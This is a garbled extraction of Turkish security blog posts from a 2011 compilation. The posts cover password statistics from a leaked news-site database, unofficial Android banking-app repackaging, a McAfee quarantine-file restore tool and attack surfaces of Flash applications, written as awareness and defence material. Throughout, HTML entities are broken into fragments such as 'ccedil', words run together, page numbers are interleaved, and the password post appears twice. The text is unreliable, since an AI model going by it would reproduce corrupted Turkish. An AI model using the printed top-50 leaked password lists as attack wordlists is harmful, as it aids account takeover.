Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 33: Hack 4 Career - 2011

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

